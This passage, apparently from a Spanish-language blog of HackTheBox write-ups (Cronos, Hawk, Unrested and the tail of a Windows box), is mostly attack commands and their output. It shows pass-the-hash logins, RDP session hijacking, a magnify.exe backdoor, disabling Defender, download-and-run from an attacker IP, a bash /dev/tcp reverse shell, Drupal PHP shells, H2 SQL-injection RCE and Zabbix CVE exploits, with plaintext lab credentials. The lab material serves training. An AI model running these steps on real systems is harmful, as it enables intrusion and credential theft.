administrator@10.10.10.132 cmd -hashes 'aad3b435b51404eeaad3b435b51404ee:d5312b245d641b3fae0d07493a022622' ``` ## RDP ```zsh xfreerdp3 /v:10.10.10.132:3389 /u:administrator /pth:d5312b245d641b3fae0d07493a022622 ``` ![image](image-10.png) ``` query session ``` ![image](image-11.png) Rapidamente ejecutamos el comando xfreerdp3 y antes de que se cierre volvemos a la powershell de administrator y volvemos a lanzar el query session y cambiamos ``` query session tscon 1 /dest:rdp-tcp#3 ``` ![image](image-12.png) ![image](image-13.png) ``` evil-winrm -i 10.10.10.132 -u administrator -H \"d5312b245d641b3fae0d07493a022622\" ``` ```powershell takeown /f magnify.exe icacls magnify.exe /grant *S-1-1-0:F copy cmd.exe magnify.exe ``` ![image](image-14.png) ``` Computer/HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon ``` ![image](image-15.png) ``` leo thetoffees123!@football ``` ``` net localgroup \"Remote Desktop Users\" Everyone /Add ``` ## RDP | Leo Volvemos a realizar el logeo con rdp ```zsh xfreerdp3 /v:10.10.10.132:3389 /u:leo /p:'thetoffees123!@football' ``` ``` query sessions tscon 1 /dest:rdp-tcp#10 ``` ![image](image-16.png) ``powershell secure string`` ```powershell 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f2fefa98a0d84f4b917dd8a1f5889c8100000000020000000000106600000001000020000000c2d2dd6646fb78feb6f7920ed36b0ade40efeaec6b090556fe6efb52a7e847cc000000000e8000000002000020000000c41d656142bd869ea7eeae22fc00f0f707ebd676a7f5fe04a0d0932dffac3f48300000006cbf505e52b6e132a07de261042bcdca80d0d12ce7e8e60022ff8d9bc042a437a1c49aa0c7943c58e802d1c758fc5dd340000000c4a81c4415883f937970216c5d91acbf80def08ad70a02b061ec88c9bb4ecd14301828044fefc3415f5e128cfb389cbe8968feb8785914070e8aebd6504afcaa ``` ```powershell $contra1 = Get-Content admin-pass.xml | ConvertTo-SecureString $contra2 = (New-Object PSCredential \"administrator\",$Contra1).GetNetworkCredential().Password echo $contra2 ``` ```powershell mb@letmein@SERVER#acc ``` ``` runas /user:Administrator cmd.exe ``` ![image](image-17.png) Y ahora si: ```powershell cipher /d root.txt ``` ## User Con la cmd de administrator desactivaremos el Windows Defender ``` Set-MpPreference -DisableRealtimeMonitoring $true ``` Descargamos `Get-WinEventData.ps1` [Get-WinEventData.ps1](https://github.com/RamblingCookieMonster/PowerShell/blob/master/Get-WinEventData.ps1) automaticamente se nos cargara la utilidad y con esto podemos enumerar procesos y comandos que se hayan ejecutado anteriormente ```zsh IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/Get-WinEventData.ps1') ``` Incluso en el script ps1 puedes ver ejemplos del cual tomare uno y solo mostrare un evento para saber si esta funcionando ```zsh Get-WinEvent -FilterHashtable @{Logname='security';id=4688} -MaxEvents 1 | Get-WinEventData | fl * ``` ![image](image-18.png) Podemos ver en la imagen que hay un parametro `e_CommandLine` ese parametro es el que nos interesa filtrar ```powershell Get-WinEvent -FilterHashtable @{Logname='security';id=4688} | Get-WinEventData | Select e_CommandLine ``` Al momento de listar solo se ve una cierta parte (truncated) ![image](image-19.png) Para arreglar esto usamos el `format table` para que nos muestre el tamaño real ```powershell Get-WinEvent -FilterHashtable @{Logname='security';id=4688} | Get-WinEventData | Select e_CommandLine | ft -AutoSize ``` De esta manera podemos ver los comandos que estan o que se ejecutaron. ![image](image-20.png) ``` tolu !zaq1234567890pl!99 ``` ``` runas /user:tolu ``` ![image](image-21.png) ```powershell cipher /d user.txt ```"},{"id":"cronos","title":"HTB - Cronos","description":"Cronos","date":"2025-07-28T00:00:00.000Z","tags":["Footprinting","dig","Domain","DNS","SQLi","NetTool","Command-Injection","crontab","PHP"],"authors":["r4cc0x"],"url":"/blog/cronos","content":"```zsh ping -c 3 10.10.10.13 PING 10.10.10.13 (10.10.10.13) 56(84) bytes of data. 64 bytes from 10.10.10.13: icmp_seq=1 ttl=63 time=132 ms 64 bytes from 10.10.10.13: icmp_seq=2 ttl=63 time=133 ms 64 bytes from 10.10.10.13: icmp_seq=3 ttl=63 time=133 ms ``` ## Recon ```zsh sudo nmap -p- --open --min-rate 5000 -v -n -Pn 10.10.10.13 -oG allPorts nmap -sCV -p 22,53,80 10.10.10.13 -oN targeted ``` ```zsh Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-27 17:47 EDT Nmap scan report for 10.10.10.13 Host is up (0.13s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA) | 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA) |_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519) 53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux) | dns-nsid: |_ bind.version: 9.10.3-P4-Ubuntu 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` ```zsh whatweb http://10.10.10.13 http://10.10.10.13 [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.10.10.13], Title[Apache2 Ubuntu Default Page: It works] ``` ```zsh ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u \"http://10.10.10.13/\" -H \"Host: FUZZ.10.10.10.13/\" -fs 11439 :: Method : GET :: URL : http://10.10.10.13/ :: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt :: Header : Host: FUZZ.10.10.10.13/ :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 :: Filter : Response size: 11439 ________________________________________________ :: Progress: [100000/100000] :: Job [1/1] :: 318 req/sec :: Duration: [0:05:38] :: Errors: 0 :: ``` ```zsh nslookup > server 10.10.10.13 Default server: 10.10.10.13 Address: 10.10.10.13#53 > 10.10.10.13 13.10.10.10.in-addr.arpa name = ns1.cronos.htb. > ``` ```zsh echo \"10.10.10.13 ns1.cronos.htb cronos.htb\" | sudo tee -a /etc/hosts ``` Ahora podemos ver que nos redirige a cronos ![image](image.png) - Wappalyzer ![image](image-1.png) ```zsh wfuzz -c --hc 404 -t 200 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt http://cronos.htb/FUZZ ``` ## SubDomain https://hacktricks.boitatech.com.br/pentesting/pentesting-dns#more-info ```zsh dig mx @10.10.10.13 cronos.htb ;; Warning, extra type option ; > DiG 9.20.9-1-Debian > ns @10.10.10.13 cronos.htb mx ; (1 server found) ;; global options: +cmd ;; Got answer: ;; ->>HEADER & /dev/tcp/10.10.14.18/9001 0>&1' ``` Credentials ![image](image-8.png) ```zsh cat /etc/crontab * * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1 ``` ![image](image-9.png) ```zsh echo ' ' > /var/www/laravel/artisan ``` ![image](image-10.png)"},{"id":"hawk","title":"HTB - Hawk","description":"Hawk","date":"2025-07-26T00:00:00.000Z","tags":["drupal","H2","PHP","Sqli","RCE"],"authors":["r4cc0x"],"url":"/blog/hawk","content":"```bash ping -c 2 10.10.10.102 PING 10.10.10.102 (10.10.10.102) 56(84) bytes of data. 64 bytes from 10.10.10.102: icmp_seq=1 ttl=63 time=135 ms 64 bytes from 10.10.10.102: icmp_seq=2 ttl=63 time=131 ms ``` ## Recon ```bash sudo nmap -p- --open --min-rate 5000 -v -n -Pn 10.10.10.102 -oG allPorts nmap -sCV -p 21,22,80,5435,8082,9092 10.10.10.102 -oN targeted ``` ```bash # Nmap 7.95 scan initiated Fri Jul 25 19:10:12 2025 as: /usr/lib/nmap/nmap --privileged -sCV -p 21,22,80,5435,8082,9092 -oN targeted 10.10.10.102 Nmap scan report for 10.10.10.102 Host is up (0.13s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_drwxr-xr-x 2 ftp ftp 4096 Jun 16 2018 messages | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.10.14.18 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e4:0c:cb:c5:a5:91:78:ea:54:96:af:4d:03:e4:fc:88 (RSA) | 256 95:cb:f8:c7:35:5e:af:a9:44:8b:17:59:4d:db:5a:df (ECDSA) |_ 256 4a:0b:2e:f7:1d:99:bc:c7:d3:0b:91:53:b9:3b:e2:79 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-title: Welcome to 192.168.56.103 | 192.168.56.103 |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-generator: Drupal 7 (http://drupal.org) | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt 5435/tcp open tcpwrapped 8082/tcp open http H2 database http console |_http-title: H2 Console 9092/tcp open XmlIpcRegSvc? 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port9092-TCP:V=7.95%I=7%D=7/25%Time=68840ED5%P=x86_64-pc-linux-gnu%r(NU SF:LL,45E,\"\\0\\0\\0\\0\\0\\0\\0\\x05\\x009\\x000\\x001\\x001\\x007\\0\\0\\0F\\0R\\0e\\0m\\0o\\ SF:0t\\0e\\0\\x20\\0c\\0o\\0n\\0n\\0e\\0c\\0t\\0i\\0o\\0n\\0s\\0\\x20\\0t\\0o\\0\\x20\\0t\\0h\\0i SF:\\0s\\0\\x20\\0s\\0e\\0r\\0v\\0e\\0r\\0\\x20\\0a\\0r\\0e\\0\\x20\\0n\\0o\\0t\\0\\x20\\0a\\0l\\0 SF:l\\0o\\0w\\0e\\0d\\0,\\0\\x20\\0s\\0e\\0e\\0\\x20\\0-\\0t\\0c\\0p\\0A\\0l\\0l\\0o\\0w\\0O\\0t\\ SF:0h\\0e\\0r\\0s\\xff\\xff\\xff\\xff\\0\\x01`\\x05\\0\\0\\x01\\xd8\\0o\\0r\\0g\\0\\.\\0h\\x002 SF:\\0\\.\\0j\\0d\\0b\\0c\\0\\.\\0J\\0d\\0b\\0c\\0S\\0Q\\0L\\0E\\0x\\0c\\0e\\0p\\0t\\0i\\0o\\0n\\0: SF:\\0\\x20\\0R\\0e\\0m\\0o\\0t\\0e\\0\\x20\\0c\\0o\\0n\\0n\\0e\\0c\\0t\\0i\\0o\\0n\\0s\\0\\x20\\0 SF:t\\0o\\0\\x20\\0t\\0h\\0i\\0s\\0\\x20\\0s\\0e\\0r\\0v\\0e\\0r\\0\\x20\\0a\\0r\\0e\\0\\x20\\0n\\ SF:0o\\0t\\0\\x20\\0a\\0l\\0l\\0o\\0w\\0e\\0d\\0,\\0\\x20\\0s\\0e\\0e\\0\\x20\\0-\\0t\\0c\\0p\\0A SF:\\0l\\0l\\0o\\0w\\0O\\0t\\0h\\0e\\0r\\0s\\0\\x20\\0\\[\\x009\\x000\\x001\\x001\\x007\\0-\\x0 SF:01\\x009\\x006\\0\\]\\0\\n\\0\\t\\0a\\0t\\0\\x20\\0o\\0r\\0g\\0\\.\\0h\\x002\\0\\.\\0m\\0e\\0s\\ SF:0s\\0a\\0g\\0e\\0\\.\\0D\\0b\\0E\\0x\\0c\\0e\\0p\\0t\\0i\\0o\\0n\\0\\.\\0g\\0e\\0t\\0J\\0d\\0b\\ SF:0c\\0S\\0Q\\0L\\0E\\0x\\0c\\0e\\0p\\0t\\0i\\0o\\0n\\0\\(\\0D\\0b\\0E\\0x\\0c\\0e\\0p\\0t\\0i\\0 SF:o\\0n\\0\\.\\0j\\0a\\0v\\0a\\0:\\x003\\x004\\x005\\0\\)\\0\\n\\0\\t\\0a\\0t\\0\\x20\\0o\\0r\\0g SF:\\0\\.\\0h\\x002\\0\\.\\0m\\0e\\0s\\0s\\0a\\0g\\0e\\0\\.\\0D\\0b\\0E\\0x\\0c\\0e\\0p\\0t\\0i\\0o SF:\\0n\\0\\.\\0g\\0e\\0t\\0\\(\\0D\\0b\\0E\\0x\\0c\\0e\\0p\\0t\\0i\\0o\\0n\\0\\.\\0j\\0a\\0v\\0a\\0 SF::\\x001\\x007\\x009\\0\\)\\0\\n\\0\\t\\0a\\0t\\0\\x20\\0o\\0r\\0g\\0\\.\\0h\\x002\\0\\.\\0m\\0e SF:\\0s\\0s\\0a\\0g\\0e\\0\\.\\0D\\0b\\0E\\0x\\0c\\0e\\0p\\0t\\0i\\0o\\0n\\0\\.\\0g\\0e\\0t\\0\\(\\0 SF:D\\0b\\0E\\0x\\0c\\0e\\0p\\0t\\0i\\0o\\0n\\0\\.\\0j\\0a\\0v\\0a\\0:\\x001\\x005\\x005\\0\\)\\0 SF:\\n\\0\\t\\0a\\0t\\0\\x20\\0o\\0r\\0g\\0\\.\\0h\\x002\\0\\.\\0m\\0e\\0s\\0s\\0a\\0g\\0e\\0\\.\\0D SF:\\0b\\0E\\0x\\0c\\0e\\0p\\0t\\0i\\0o\\0n\\0\\.\\0g\\0e\\0t\\0\\(\\0D\\0b\\0E\\0x\\0c\\0e\\0p\\0t SF:\\0i\\0o\\0n\\0\\.\\0j\\0a\\0v\\0a\\0:\\x001\\x004\\x004\\0\\)\\0\\n\\0\\t\\0a\\0t\\0\\x20\\0o\\ SF:0r\")%r(Help,45E,\"\\0\\0\\0\\0\\0\\0\\0\\x05\\x009\\x000\\x001\\x001\\x007\\0\\0\\0F\\0R\\ SF:0e\\0m\\0o\\0t\\0e\\0\\x20\\0c\\0o\\0n\\0n\\0e\\0c\\0t\\0i\\0o\\0n\\0s\\0\\x20\\0t\\0o\\0\\x20 SF:\\0t\\0h\\0i\\0s\\0\\x20\\0s\\0e\\0r\\0v\\0e\\0r\\0\\x20\\0a\\0r\\0e\\0\\x20\\0n\\0o\\0t\\0\\x2 SF:0\\0a\\0l\\0l\\0o\\0w\\0e\\0d\\0,\\0\\x20\\0s\\0e\\0e\\0\\x20\\0-\\0t\\0c\\0p\\0A\\0l\\0l\\0o\\ SF:0w\\0O\\0t\\0h\\0e\\0r\\0s\\xff\\xff\\xff\\xff\\0\\x01`\\x05\\0\\0\\x01\\xd8\\0o\\0r\\0g\\0\\ SF:.\\0h\\x002\\0\\.\\0j\\0d\\0b\\0c\\0\\.\\0J\\0d\\0b\\0c\\0S\\0Q\\0L\\0E\\0x\\0c\\0e\\0p\\0t\\0i SF:\\0o\\0n\\0:\\0\\x20\\0R\\0e\\0m\\0o\\0t\\0e\\0\\x20\\0c\\0o\\0n\\0n\\0e\\0c\\0t\\0i\\0o\\0n\\0 SF:s\\0\\x20\\0t\\0o\\0\\x20\\0t\\0h\\0i\\0s\\0\\x20\\0s\\0e\\0r\\0v\\0e\\0r\\0\\x20\\0a\\0r\\0e\\ SF:0\\x20\\0n\\0o\\0t\\0\\x20\\0a\\0l\\0l\\0o\\0w\\0e\\0d\\0,\\0\\x20\\0s\\0e\\0e\\0\\x20\\0-\\0t SF:\\0c\\0p\\0A\\0l\\0l\\0o\\0w\\0O\\0t\\0h\\0e\\0r\\0s\\0\\x20\\0\\[\\x009\\x000\\x001\\x001\\x SF:007\\0-\\x001\\x009\\x006\\0\\]\\0\\n\\0\\t\\0a\\0t\\0\\x20\\0o\\0r\\0g\\0\\.\\0h\\x002\\0\\.\\ SF:0m\\0e\\0s\\0s\\0a\\0g\\0e\\0\\.\\0D\\0b\\0E\\0x\\0c\\0e\\0p\\0t\\0i\\0o\\0n\\0\\.\\0g\\0e\\0t\\ SF:0J\\0d\\0b\\0c\\0S\\0Q\\0L\\0E\\0x\\0c\\0e\\0p\\0t\\0i\\0o\\0n\\0\\(\\0D\\0b\\0E\\0x\\0c\\0e\\0 SF:p\\0t\\0i\\0o\\0n\\0\\.\\0j\\0a\\0v\\0a\\0:\\x003\\x004\\x005\\0\\)\\0\\n\\0\\t\\0a\\0t\\0\\x20 SF:\\0o\\0r\\0g\\0\\.\\0h\\x002\\0\\.\\0m\\0e\\0s\\0s\\0a\\0g\\0e\\0\\.\\0D\\0b\\0E\\0x\\0c\\0e\\0p SF:\\0t\\0i\\0o\\0n\\0\\.\\0g\\0e\\0t\\0\\(\\0D\\0b\\0E\\0x\\0c\\0e\\0p\\0t\\0i\\0o\\0n\\0\\.\\0j\\0 SF:a\\0v\\0a\\0:\\x001\\x007\\x009\\0\\)\\0\\n\\0\\t\\0a\\0t\\0\\x20\\0o\\0r\\0g\\0\\.\\0h\\x002\\ SF:0\\.\\0m\\0e\\0s\\0s\\0a\\0g\\0e\\0\\.\\0D\\0b\\0E\\0x\\0c\\0e\\0p\\0t\\0i\\0o\\0n\\0\\.\\0g\\0e SF:\\0t\\0\\(\\0D\\0b\\0E\\0x\\0c\\0e\\0p\\0t\\0i\\0o\\0n\\0\\.\\0j\\0a\\0v\\0a\\0:\\x001\\x005\\x SF:005\\0\\)\\0\\n\\0\\t\\0a\\0t\\0\\x20\\0o\\0r\\0g\\0\\.\\0h\\x002\\0\\.\\0m\\0e\\0s\\0s\\0a\\0g\\ SF:0e\\0\\.\\0D\\0b\\0E\\0x\\0c\\0e\\0p\\0t\\0i\\0o\\0n\\0\\.\\0g\\0e\\0t\\0\\(\\0D\\0b\\0E\\0x\\0c SF:\\0e\\0p\\0t\\0i\\0o\\0n\\0\\.\\0j\\0a\\0v\\0a\\0:\\x001\\x004\\x004\\0\\)\\0\\n\\0\\t\\0a\\0t\\ SF:0\\x20\\0o\\0r\"); Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Jul 25 19:10:28 2025 -- 1 IP address (1 host up) scanned in 16.22 seconds ``` ### Web 8082 ![image](image.png) Podemos logearnos como anonymous en FTP: ```bash ftp 10.10.10.102 ``` ![image](image-1.png) https://docs.openssl.org/3.2/man1/openssl-enc/ ```bash file .drupal.txt.enc ``` https://github.com/vlohacks/encrack ```bash cat drupal.txt.enc | base64 -d > drupal.enc ``` ```bash ./encrack -i ./drupal.enc -w /usr/share/wordlists/rockyou.txt -m firstascii -t 64 * Loaded 160 bytes ciphertext * Warning: no cipher list provided, using auto-suggested list * Loaded 144 cipher(s) * Loaded 14344391 password(s) [MATCHER] Warning: setting default value of 'numBytes' to value '32' [MATCHER] use -o numBytes= to set user defined value * Running 64 thread(s)... [30]: Found candidate! Password : friends Cipher : aes-256-cbc Plaintext: Daniel, Following the password for the portal: PencilKeyboardScanner123 Please let us know when the portal is ready. Kind Regards, IT department �9�o6�q [30]: Found candidate! Password : friends Cipher : aes256 Plaintext: Daniel ``` https://github.com/thosearetheguise/decrypt-openssl-bruteforce ```bash python3 decrypt-openssl-bruteforce.py -i /root/opt/hawk/drupal.enc -w /usr/share/wordlists/rockyou.txt -s -v -o /root/opt/hawk/out.txt ``` ``` Optional argument values: Salted:True base64:False cipher:-aes256 Trying password: 123456 Key Found! The key is:123456 Output File Name : out.txt ``` Logeamos en drupal web ``` admin PencilKeyboardScanner123 ``` ![image](image-2.png) Alli hay una seccion para subir una pagina basica, pense en una reverse shell de pentest monkeys [reverse shell](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php) pero en la parte inferior solo mencionan la interpretacion de html, lo cual es curioso porque con wappalyzer veo que si hay contenido php: ![image](image-3.png) Despues de buscar si habia alguna opcion para habilitar php, veo que esta la interpretacion desctivada, en la seccion de modulos: ![image](image-4.png) Solo es activarlo y volver a la reverse shell y cambiar de Full html a PHP code y se ejecutara la reverse shell: ![image](image-5.png) ``` www-data@hawk:/var/www/html/sites/default$ cat settings.php | grep \"password\" cat settings.php | grep \"password\" * 'password' => 'password', * username, password, host, and database name. * 'password' => 'password', * 'password' => 'password', * 'password' => 'password', * 'password' => 'password', 'password' => 'drupal4hawk', ``` `drupal4hawk` Si intentamos usar esta contraseña con daniel se nos abre el python3 interactivo. ``` su daniel Password: drupal4hawk Python 3.6.5 (default, Apr 1 2018, 05:46:30) [GCC 7.3.0] on linux Type \"help\", \"copyright\", \"credits\" or \"license\" for more information. >>> ``` ```bash import pty; pty.spawn('/bin/bash') ``` Una vez teniendo una shell como daniel, procedemos a enumerar: ![image](image-6.png) ## H2 Console SQLi -> RCE ```bash netstat -nltp ``` ![image](image-7.png) Anteriormente vimos que el 8082 tenia un aviso de que no es posible desde el exterior visualizarlo, pero ahora que somos daniel quiza podriamos ahora. ```bash ssh -L 8082:localhost:8082 daniel@10.10.10.102 ``` ![image](image-8.png) https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/h2-java-sql-database.html#h2-sql-injection-to-rce El JDBC URL es donde crearemos la base de datos, la cambiare en la ruta /root, una vez cambiado podemos conectarnos sin credenciales: ![image](image-9.png) https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html?source=post_page-----c5fd87e8a493--------------------------------------- A traves de este articulo nos mencionan una posible forma de ejecutar comandos remotos a traves de inyecciones sql. ![image](image-10.png) [reverse shell one liners](https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) Despues de intentar multiples reverse shell's, intente por algo mas sencillo y es subir de nuevo la reverse shell de pentest monkeys para ejecutarlo con php ![image](image-11.png) ![image](image-12.png) Otra via mas facil es con este script para obtener la shell sin interactuar con la consola H2. https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed ```bash python3 h2-exploit.py -H 127.0.0.1:8082 -d jdbc:h2:~/root ``` ![image](image-13.png)"},{"id":"unrested","title":"HTB - Unrested","description":"HTB - Unrested","date":"2025-07-26T00:00:00.000Z","tags":["HackTheBox","Medium","wrapper","CVE-2024-42327","API","CVE-2024-36467"],"authors":[],"url":"/blog/unrested","content":"## Box Info | Name | Unrested | | :-------------------- | ---------------: | | Release Date | 05 Dec, 2024 | | OS | Linux | | Rated Difficulty | Medium | ```bash ping -c 3 10.10.11.50 PING 10.10.11.50 (10.10.11.50) 56(84) bytes of data. 64 bytes from 10.10.11.50: icmp_seq=1 ttl=63 time=130 ms 64 bytes from 10.10.11.50: icmp_seq=2 ttl=63 time=130 ms 64 bytes from 10.10.11.50: icmp_seq=3 ttl=63 time=133 ms ``` As is common in real life pentests, you will start the Unrested box with credentials for the following account on Zabbix: matthew / 96qzn0h2e1k3 ## Recon **Commands** ```bash sudo nmap -p- --open --min-rate 5000 -n -vv -Pn 10.10.11.50 -oG allPorts nmap -sCV -p 22,80,10050,10051 10.10.11.50 -oN targeted ``` ```bash Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-21 15:45 EDT Nmap scan report for 10.10.11.50 Host is up (0.13s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA) |_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519) 80/tcp open http Apache httpd 2.4.52 ((Ubuntu)) |_http-title: Site doesn't have a title (text/html). |_http-server-header: Apache/2.4.52 (Ubuntu) 10050/tcp open tcpwrapped 10051/tcp open ssl/zabbix-trapper? Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` ```bash whatweb http://10.10.11.50 http://10.10.11.50 [200 OK] Apache[2.4.52], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.52 (Ubuntu)], IP[10.10.11.50], Meta-Refresh-Redirect[/zabbix/] http://10.10.11.50/zabbix/ [200 OK] Apache[2.4.52], Cookies[zbx_session], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.52 (Ubuntu)], HttpOnly[zbx_session], IP[10.10.11.50], Meta-Author[Zabbix SIA], PasswordField[password], Script, Title[Unrested: Zabbix], UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN], X-UA-Compatible[IE=Edge], X-XSS-Protection[1; mode=block] ``` ![Image](unrested1.png \"unrested\") [CVE-2024-36467](https://www.cve.news/cve-2024-36467/) ## CVE-2024-36467 Zabbix ofrece un endpoint de API llamado user.update, diseñado para, entre otras cosas, permitir que los usuarios actualicen sus datos (como su correo electrónico). El problema: La API no comprueba correctamente los permisos cuando solicitas añadirte a otro grupo. Si puedes acceder a la API, puedes simplemente decir: \"Hola Zabbix, ahora soy administrador\" y funciona. ¡Ni siquiera necesitas ser administrador (todavía)! Basta con un usuario autenticado (con sesión iniciada) con acceso a la API. [Github - zabbix-api](https://github.com/zabbix/zabbix/blob/7.0.0/ui/include/classes/api/services/CUser.php#L25) [GHSA-xwvj-c6cj-6xgw](https://github.com/advisories/GHSA-xwvj-c6cj-6xgw) [Manual-ZABBIX-API](https://www.zabbix.com/documentation/current/en/manual/api) ![Image](image1.png) Vemos que el id es el mismo para este usuario ![Image](image-2.png) ```bash curl -X POST \"http://10.10.11.50/zabbix/api_jsonrpc.php\" -H 'Content-Type: application/json-rpc' -d '{\"jsonrpc\":\"2.0\",\"method\":\"user.login\",\"params\":{\"username\":\"matthew\",\"password\":\"96qzn0h2e1k3\"},\"id\":1}' ``` ```bash {\"jsonrpc\":\"2.0\",\"result\":\"8b3aab735a8b24aab283e058d94fedb5\",\"id\":1} ``` ``` 4ec470db7e8f1e03a8d9b9348ca1f9def6bd115c46870af5fc20d0633b189aca ``` ![Image](image-3.png) [Default ID 7 Group Admin](https://www.rubydoc.info/gems/zabx) ```bash 7 → Zabbix administrators (Administradores) ``` ```bash curl -X POST \"http://10.10.11.50/zabbix/api_jsonrpc.php\" -H 'Content-Type: application/json-rpc' -d '{\"jsonrpc\":\"2.0\",\"method\":\"user.update\",\"params\":{\"userid\":\"3\",\"usrgrps\":[{\"usrgrpid\":\"13\"},{\"usrgrpid\":\"7\"}]},\"auth\":\"4ec470db7e8f1e03a8d9b9348ca1f9def6bd115c46870af5fc20d0633b189aca\",\"id\":1}' ``` ```json { \"jsonrpc\": \"2.0\", \"result\": { \"userids\": [ \"3\" ] }, \"id\": 1 } ``` Ahora intentamos listar todos los usuarios. ```bash curl -X POST \"http://10.10.11.50/zabbix/api_jsonrpc.php\" -H 'Content-Type: application/json-rpc' -d '{\"jsonrpc\":\"2.0\",\"method\":\"user.get\",\"params\":{\"output\":[\"userid\"],\"selectUsrgrps\":[\"usrgrpid\",\"name\"],\"filter\": {\"alias\":\"matthew\"}}, \"auth\":\"4ec470db7e8f1e03a8d9b9348ca1f9def6bd115c46870af5fc20d0633b189aca\",\"id\":1}' | jq ``` ```json { \"jsonrpc\": \"2.0\", \"result\": [ { \"userid\": \"1\", \"usrgrps\": [ { \"usrgrpid\": \"7\", \"name\": \"Zabbix administrators\" }, { \"usrgrpid\": \"13\", \"name\": \"Internal\" } ] }, { \"userid\": \"2\", \"usrgrps\": [ { \"usrgrpid\": \"13\", \"name\": \"Internal\" } ] }, { \"userid\": \"3\", \"usrgrps\": [ { \"usrgrpid\": \"7\", \"name\": \"Zabbix administrators\" }, { \"usrgrpid\": \"13\", \"name\": \"Internal\" } ] } ], \"id\": 1 } ``` ## CVE-2024-42327 https://github.com/compr00t/CVE-2024-42327 ![Image](image-4.png) https://github.com/BridgerAlderson/Zabbix-CVE-2024-42327-SQL-Injection-RCE ```bash python3 exploit.py API URL: http://10.10.11.50/zabbix/api_jsonrpc.php username: matthew password: 96qzn0h2e1k3 lhost (local ip address for reverse shell): 10.10.14.18 lport (port number for reverse shell): 4444 Authenticating... Login successful! Auth token: c1f7a918b1b81abe6ef355ccbee3159a Starting data extraction... Extracting admin session: 98b39bcb942358c651a90ebb2a900ace Admin session extracted: 98b39bcb942358c651a90ebb2a900ace host.get response: {'jsonrpc': '2.0', 'result': [{'hostid': '10084', 'host': 'Zabbix server', 'interfaces': [{'interfaceid': '1'}]}], 'id': 1} Reverse shell command executed successfully. ``` ![Image](image-5.png) ```bash sudo -l Matching Defaults entries for zabbix on unrested: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin, use_pty User zabbix may run the following commands on unrested: (ALL : ALL) NOPASSWD: /usr/bin/nmap * ``` ## Privilege Escalation ```bash zabbix@unrested:/home/matthew$ nmap --interactive Interactive mode is disabled for security reasons. ``` ```bash zabbix@unrested:/home/matthew$ echo 'os.execute(\"/bin/bash -p\")' > test.sh ``` ```bash zabbix@unrested:/home/matthew$ nmap -p --script test.sh Script mode is disabled for security reasons. ``` #### Wrapper Bash ```bash which nmap /usr/bin/nmap zabbix@unrested:/home/matthew$ cat /usr/bin/nmap #!/bin/bash ################################# ## Restrictive nmap for Zabbix ## ################################# # List of restricted options and corresponding error messages declare -A RESTRICTED_OPTIONS=( [\"--interactive\"]=\"Interactive mode is disabled for security reasons.\" [\"--script\"]=\"Script mode is disabled for security reasons.\" [\"-oG\"]=\"Scan 